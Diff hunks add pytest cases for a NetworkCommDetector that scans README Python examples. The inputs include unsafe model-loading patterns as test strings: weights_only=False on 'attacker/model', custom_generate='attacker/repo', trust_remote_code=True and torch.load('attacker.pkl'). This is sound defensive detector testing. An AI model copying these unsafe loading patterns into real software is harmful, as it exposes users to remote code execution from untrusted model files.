+    def test_readme_python_example_rejects_unsafe_call_relative_named_device(
+        self,
+        device_transfer: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "device = 'cuda'\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            f"{device_transfer}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
 
     def test_readme_python_example_allows_tokenizer_output_on_trusted_model_device(self) -> None:
         """A uniquely bound Transformers model provides a canonical tensor device."""

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3027,6 +3027,156 @@ class TestNetworkCommDetector:
         assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
+        "model_flow",
+        [
+            ("AutoModel.from_pretrained(\n    'attacker/model', use_safetensors=False, weights_only=False\n)\n"),
+            "AutoModel.from_pretrained('attacker/model', weights_only=None)\n",
+            "AutoModel.from_pretrained('attacker/model', weights_only=1)\n",
+            "AutoModel.from_pretrained('attacker/model', weights_only=not False)\n",
+            ("weights_only = False\nAutoModel.from_pretrained('attacker/model', weights_only=weights_only)\n"),
+            "AutoModel.from_pretrained('attacker/model', **{'weights_only': False})\n",
+            ("options = {'weights_only': False}\nAutoModel.from_pretrained('attacker/model', **options)\n"),
+            ("weights_only = False\nAutoModel.from_pretrained('attacker/model', **{'weights_only': weights_only})\n"),
+            ("loader = AutoModel.from_pretrained\nloader('attacker/model', weights_only=False)\n"),
+            ("loader = AutoModel.from_pretrained\nloader('attacker/model', **{'weights_only': False})\n"),
+            (
+                "options = {}\n"
+                "options |= {'weights_only': False}\n"
+                "AutoModel.from_pretrained('attacker/model', **options)\n"
+            ),
+            (
+                "options = {}\n"
+                "options |= {'weights_only': None}\n"
+                "AutoModel.from_pretrained('attacker/model', **options)\n"
+            ),
+            (
+                "weights_only = image_url == ''\n"
+                "options = {}\n"
+                "options |= {'weights_only': weights_only}\n"
+                "AutoModel.from_pretrained('attacker/model', **options)\n"
+            ),
+            (
+                "options = {'weights_only': True}\n"
+                "options |= {'weights_only': False}\n"
+                "AutoModel.from_pretrained('attacker/model', **options)\n"
+            ),
+            (
+                "options = {}\n"
+                "options |= {'revision': 'main'}\n"
+                "options |= {'weights_only': False}\n"
+                "AutoModel.from_pretrained('attacker/model', **options)\n"
+            ),
+            (
+                "options = {}\n"
+                "options |= {'weights_only': False}\n"
+                "alias = options\n"
+                "AutoModel.from_pretrained('attacker/model', **alias)\n"
+            ),
+            (
+                "options = {}\n"
+                "options |= {'weights_only': False}\n"
+                "loader = AutoModel.from_pretrained\n"
+                "loader('attacker/model', **options)\n"
+            ),
+        ],
+        ids=[
+            "explicit-false",
+            "explicit-none",
+            "truthy-integer",
+            "dynamic-expression",
+            "named-false",
+            "inline-mapping-false",
+            "bound-mapping-false",
+            "named-inline-mapping-false",
+            "callable-alias-false",
+            "callable-alias-mapping-false",
+            "incremental-union-false",
+            "incremental-union-none",
+            "incremental-union-dynamic",
+            "incremental-union-overwrite-true",
+            "repeated-incremental-union-false",
+            "incremental-union-mapping-alias-false",
+            "callable-alias-incremental-union-false",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_safe_weights_only(
+        self,
+        model_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{model_flow}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "model_flow",
+        [
+            ("AutoModel.from_pretrained(\n    'official/model', use_safetensors=False, weights_only=True\n)\n"),
+            ("weights_only = True\nAutoModel.from_pretrained('official/model', weights_only=weights_only)\n"),
+            "AutoModel.from_pretrained('official/model', **{'weights_only': True})\n",
+            ("options = {'weights_only': True}\nAutoModel.from_pretrained('official/model', **options)\n"),
+            (
+                "weights_only = True\n"
+                "AutoModel.from_pretrained('official/model', weights_only=weights_only)\n"
+                "weights_only = False\n"
+            ),
+            ("model = AutoModel.from_pretrained('official/model')\nmodel.generate(weights_only=False)\n"),
+            (
+                "options = {}\n"
+                "options |= {'weights_only': True}\n"
+                "AutoModel.from_pretrained('official/model', **options)\n"
+            ),
+            (
+                "options = {}\n"
+                "options |= {'revision': 'main'}\n"
+                "options |= {'weights_only': True}\n"
+                "loader = AutoModel.from_pretrained\n"
+                "loader('official/model', **options)\n"
+            ),
+            (
+                "options = {}\n"
+                "options |= {'weights_only': False}\n"
+                "model = AutoModel.from_pretrained('official/model')\n"
+                "model.generate(**options)\n"
+            ),
+        ],
+        ids=[
+            "explicit-true",
+            "named-true",
+            "inline-mapping-true",
+            "bound-mapping-true",
+            "post-call-rebind",
+            "generate-option-is-out-of-scope",
+            "incremental-union-true",
+            "callable-alias-repeated-incremental-union-true",
+            "generate-incremental-union-is-out-of-scope",
+        ],
+    )
+    def test_readme_python_example_allows_proven_safe_weights_only(
+        self,
+        model_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{model_flow}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
         "generate_argument",
         [
             "custom_generate='attacker/repo'",

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3249,6 +3249,181 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        ("factory_name", "instance_name", "mapping_expression"),
+        [
+            ("AutoProcessor", "processor", "processor(images=image, return_tensors='pt')"),
+            (
+                "AutoProcessor",
+                "processor",
+                "processor(images=image, return_tensors='pt').to(device='cuda')",
+            ),
+            ("AutoTokenizer", "tokenizer", "tokenizer('hello', return_tensors='pt')"),
+            (
+                "AutoFeatureExtractor",
+                "feature_extractor",
+                "feature_extractor(images=image, return_tensors='pt')",
+            ),
+        ],
+        ids=["processor-output", "processor-output-device-transfer", "tokenizer-output", "feature-output"],
+    )
+    def test_readme_python_example_allows_inline_transformers_mapping_generate_kwargs(
+        self,
+        factory_name: str,
+        instance_name: str,
+        mapping_expression: str,
+    ) -> None:
+        """A canonical inline Transformers mapping is trusted model input."""
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            f"from transformers import AutoModel, {factory_name}\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            f"{instance_name} = {factory_name}.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"model.generate(**{mapping_expression})\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert not [
+            finding
+            for finding in findings
+            if finding["type"] in {"network_library", "network_function"}
+            and finding["severity"] in {"HIGH", "CRITICAL"}
+        ]
+        assert all(finding["severity"] == "INFO" for finding in findings)
+
+    @pytest.mark.parametrize(
+        ("setup", "generate_statement"),
+        [
+            ("", "model.generate(**model(images=image, return_tensors='pt'))\n"),
+            ("", "model.generate(**processor(images=image, return_tensors='pt', trust_remote_code=True))\n"),
+            (
+                "processor_options = image\n",
+                "model.generate(**processor(**processor_options))\n",
+            ),
+            (
+                "processor_options = {'images': image, 'return_tensors': 'pt'}\n"
+                "alias = processor_options\n"
+                "alias |= {'trust_remote_code': True}\n",
+                "model.generate(**processor(**processor_options))\n",
+            ),
+            ("processor = model\n", "model.generate(**processor(images=image, return_tensors='pt'))\n"),
+            (
+                "",
+                "model.generate(**processor(images=image, return_tensors='pt').to(device=image.mode))\n",
+            ),
+            (
+                "",
+                "model.generate(**processor(images=image, return_tensors='pt').to('cpu', 'cuda'))\n",
+            ),
+            (
+                "",
+                "deferred = (model.generate(**processor(images=image, return_tensors='pt')) for _ in range(1))\n"
+                "processor = model\n",
+            ),
+        ],
+        ids=[
+            "unsafe-factory",
+            "remote-code-option",
+            "dynamic-kwargs",
+            "mutated-kwargs-alias",
+            "rebound-processor",
+            "dynamic-device",
+            "extra-device-argument",
+            "deferred-processor-rebind",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_inline_processor_generate_kwargs(
+        self,
+        setup: str,
+        generate_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{setup}"
+            f"{generate_statement}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
+
+    @pytest.mark.parametrize(
+        "generate_statement",
+        [
+            ("if True:\n    processor = torch.load\n    model.generate(**processor('attacker.pkl'))\n"),
+            "for processor in [torch.load]:\n    model.generate(**processor('attacker.pkl'))\n",
+            "calls = [model.generate(**processor('attacker.pkl')) for processor in [torch.load]]\n",
+            "calls = {model.generate(**processor('attacker.pkl')) for processor in [torch.load]}\n",
+            "calls = {processor: model.generate(**processor('attacker.pkl')) for processor in [torch.load]}\n",
+        ],
+        ids=["if-assignment", "for-target", "list-comprehension", "set-comprehension", "dict-comprehension"],
+    )
+    def test_readme_python_example_rejects_inline_mapping_factory_shadowing(
+        self,
+        generate_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{generate_statement}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "generate_statement",
+        [
+            "if True:\n    model.generate(**processor(images=image, return_tensors='pt'))\n",
+            "model.generate(**processor(images=image, return_tensors='pt'))\nprocessor = torch.load\n",
+            "model.generate(**processor(images=image, return_tensors='pt')); processor = torch.load\n",
+        ],
+        ids=["nested-without-shadow", "eager-post-call-rebind", "same-line-eager-post-call-rebind"],
+    )
+    def test_readme_python_example_allows_unshadowed_inline_mapping_factory(
+        self,
+        generate_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{generate_statement}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
         "processor_call",
         [
             (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -5932,6 +5932,138 @@ class TestNetworkCommDetector:
         [
             (
                 "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "old = inputs\n"
+                "inputs = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "first_device_inputs = inputs.to('cuda')\n"
+                "device_inputs = first_device_inputs.to('cpu')\n"
+                "inputs = {}\n"
+                "first_device_inputs = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "older = old\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = {}\n"
+                "old = {}\n"
+                "older |= {'trust_remote_code': True}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = {}\n"
+                "old['custom_generate'] = 'attacker/repo'\n"
+            ),
+        ],
+        ids=[
+            "prior-alias-source-rebind",
+            "post-transfer-alias-source-rebind",
+            "chained-transfer-source-rebind",
+            "chained-alias-source-rebind",
+            "subscript-mutation-source-rebind",
+        ],
+    )
+    def test_readme_python_example_rejects_mutated_live_renamed_transfer_alias(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_flow}"
+            "model.generate(**device_inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = {}\n"
+                "inputs |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "old = {}\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = {}\n"
+                "old = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "old = inputs\n"
+                "inputs = {}\n"
+                "old = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+        ],
+        ids=[
+            "source-name-rebound",
+            "prior-alias-rebound-before-transfer",
+            "prior-alias-rebound-after-transfer",
+            "post-transfer-alias-rebound",
+        ],
+    )
+    def test_readme_python_example_allows_mutation_of_detached_renamed_transfer_alias(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_flow}"
+            "model.generate(**device_inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
                 "alias = inputs\n"
                 "alias |= {'custom_generate': 'attacker/repo'}\n"
                 "device_inputs = inputs.to('cuda')\n"

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3295,6 +3295,145 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        "compound_statement",
+        [
+            (
+                "with torch.no_grad():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    model.generate(**inputs)\n"
+            ),
+        ],
+        ids=["no-grad", "conditional-device"],
+    )
+    def test_readme_python_example_allows_ordered_nested_mapping_binding(
+        self,
+        compound_statement: str,
+    ) -> None:
+        """A mapping bound earlier in the same single-execution body is canonical."""
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{compound_statement}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "compound_statement",
+        [
+            (
+                "with torch.no_grad():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    alias = inputs\n"
+                "    alias |= {'custom_generate': 'attacker/repo'}\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "with torch.no_grad():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    inputs = {'custom_generate': 'attacker/repo'}\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "with torch.no_grad():\n"
+                "    processor = model\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "for _ in range(1):\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "with torch.no_grad():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    def deferred():\n"
+                "        model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "else:\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "outputs = [\n"
+                "    model.generate(**inputs)\n"
+                "    for inputs in [processor(images=image, return_tensors='pt')]\n"
+                "]\n"
+            ),
+            (
+                "with torch.no_grad():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    for inputs in [{'custom_generate': 'attacker/repo'}]:\n"
+                "        model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "for _ in range(1):\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "model.generate(**inputs)\n"
+            ),
+            ("def prepare():\n    inputs = processor(images=image, return_tensors='pt')\nmodel.generate(**inputs)\n"),
+            (
+                "with torch.no_grad():\n"
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "model.generate(**inputs)\n"
+            ),
+        ],
+        ids=[
+            "same-compound-alias-mutation",
+            "same-compound-rebind",
+            "same-compound-factory-shadow",
+            "repeated-loop",
+            "deferred-function",
+            "sibling-branch",
+            "comprehension-target",
+            "loop-shadow",
+            "conditional-binding-before-top-level-call",
+            "loop-binding-before-top-level-call",
+            "deferred-binding-before-top-level-call",
+            "no-grad-binding-before-top-level-call",
+        ],
+    )
+    def test_readme_python_example_rejects_unsafe_nested_mapping_binding(
+        self,
+        compound_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{compound_statement}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
         ("factory_name", "instance_name", "mapping_expression"),
         [
             ("AutoProcessor", "processor", "processor(images=image, return_tensors='pt')"),

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3608,6 +3608,125 @@ class TestNetworkCommDetector:
     @pytest.mark.parametrize(
         "mapping_setup",
         [
+            "inputs = {'input_ids': 1} if condition else {'input_ids': 2}\nmodel.generate(**inputs)\n",
+            "model.generate(**({'input_ids': 1} if condition else {'input_ids': 2}))\n",
+            (
+                "left = {'input_ids': 1}\n"
+                "right = {'attention_mask': 1}\n"
+                "inputs = left if condition else right\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "inputs = ({'input_ids': 1} if condition else {'attention_mask': 1}) "
+                "if condition else {'token_type_ids': 1}\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "inputs = {'custom_generate': None} if condition else {'trust_remote_code': False}\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if True:\n"
+                "    inputs = {'input_ids': 1} if condition else {'input_ids': 2}\n"
+                "    model.generate(**inputs)\n"
+            ),
+        ],
+        ids=["named", "inline", "named-arms", "nested", "disabled-remote-options", "supported-body"],
+    )
+    def test_readme_python_example_allows_proven_safe_mapping_ifexp(self, mapping_setup: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "condition = len(image_url) > 0\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_setup}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_setup",
+        [
+            "inputs = {'custom_generate': 'attacker/repo'} if condition else {'input_ids': 1}\n",
+            "inputs = {'input_ids': 1} if condition else {'trust_remote_code': True}\n",
+            "inputs = get_options() if condition else {'input_ids': 1}\n",
+            "inputs = {'input_ids': 1} if condition else get_options()\n",
+            "inputs = {'input_ids': 1} if True else {'custom_generate': 'attacker/repo'}\n",
+            "key = 'input_ids'\ninputs = {key: 1} if condition else {'attention_mask': 1}\n",
+            (
+                "left = {'input_ids': 1}\n"
+                "left['custom_generate'] = 'attacker/repo'\n"
+                "inputs = left if condition else {'attention_mask': 1}\n"
+            ),
+            ("left = {'input_ids': 1}\nleft = get_options()\ninputs = left if condition else {'attention_mask': 1}\n"),
+            (
+                "left = {'input_ids': 1}\n"
+                "alias = left\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n"
+                "inputs = left if condition else {'attention_mask': 1}\n"
+            ),
+            "inputs = {'input_ids': 1} if choose() else {'attention_mask': 1}\n",
+        ],
+        ids=[
+            "unsafe-body",
+            "unsafe-else",
+            "dynamic-body",
+            "dynamic-else",
+            "constant-unused-unsafe-arm",
+            "computed-key",
+            "mutated-arm",
+            "rebound-arm",
+            "alias-mutated-arm",
+            "untrusted-condition",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_mapping_ifexp(self, mapping_setup: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "condition = len(image_url) > 0\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "def get_options():\n"
+            "    return {'custom_generate': 'attacker/repo'}\n"
+            "def choose():\n"
+            "    return True\n"
+            f"{mapping_setup}"
+            "model.generate(**inputs)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_rejects_excessively_nested_mapping_ifexp(self) -> None:
+        mapping = "{'input_ids': 1}"
+        for index in range(400):
+            mapping = f"({mapping} if condition else {{'input_ids': {index}}})"
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "condition = len(image_url) > 0\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"inputs = {mapping}\n"
+            "model.generate(**inputs)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "mapping_setup",
+        [
             "inputs = {'input_ids': 1} + {'attention_mask': 1}\n",
             "inputs = {'custom_generate': 'attacker/repo'} | {'input_ids': 1}\n",
             "inputs = {'input_ids': 1} | {'trust_remote_code': True}\n",
@@ -5426,6 +5545,249 @@ class TestNetworkCommDetector:
             b"model.generate(**options)\n"
             b"requests.get(image_url, stream=True)\n```\n"
         )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "expression_rebind",
+        [
+            "True or (alias := {})\n",
+            "False and (alias := {})\n",
+            "(alias := {}) if False else None\n",
+            "None if True else (alias := {})\n",
+            "False or True or (alias := {})\n",
+            "True and False and (alias := {})\n",
+            "image.mode or (alias := {})\n",
+            "(alias := {}) if image.mode else None\n",
+        ],
+        ids=[
+            "true-or-rhs",
+            "false-and-rhs",
+            "ifexp-unselected-body",
+            "ifexp-unselected-else",
+            "chained-or",
+            "chained-and",
+            "runtime-boolop",
+            "runtime-ifexp",
+        ],
+    )
+    def test_readme_python_example_rejects_alias_mutation_after_unproven_expression_rebind(
+        self,
+        expression_rebind: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "alias = options = {'custom_generate': None}\n"
+            f"{expression_rebind}"
+            "alias |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**options)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_rejects_dead_expression_rebind_before_shared_subscript_mutation(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"alias = options = {'custom_generate': None}\n"
+            b"True or (alias := {})\n"
+            b"alias['custom_generate'] = 'attacker/repo'\n"
+            b"model.generate(**options)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "function_definition",
+        [
+            "def helper(alias):\n    pass\n",
+            "def helper(alias, /):\n    pass\n",
+            "def helper(*, alias):\n    pass\n",
+            "def helper(*alias):\n    pass\n",
+            "def helper(**alias):\n    pass\n",
+            "async def helper(alias):\n    pass\n",
+            "async def helper(alias, /):\n    pass\n",
+            "async def helper(*, alias):\n    pass\n",
+            "async def helper(*alias):\n    pass\n",
+            "async def helper(**alias):\n    pass\n",
+        ],
+        ids=[
+            "positional",
+            "positional-only",
+            "keyword-only",
+            "var-positional",
+            "var-keyword",
+            "async-positional",
+            "async-positional-only",
+            "async-keyword-only",
+            "async-var-positional",
+            "async-var-keyword",
+        ],
+    )
+    def test_readme_python_example_rejects_alias_mutation_after_function_parameter_shadow(
+        self,
+        function_definition: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "requests.get(image_url, stream=True)\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
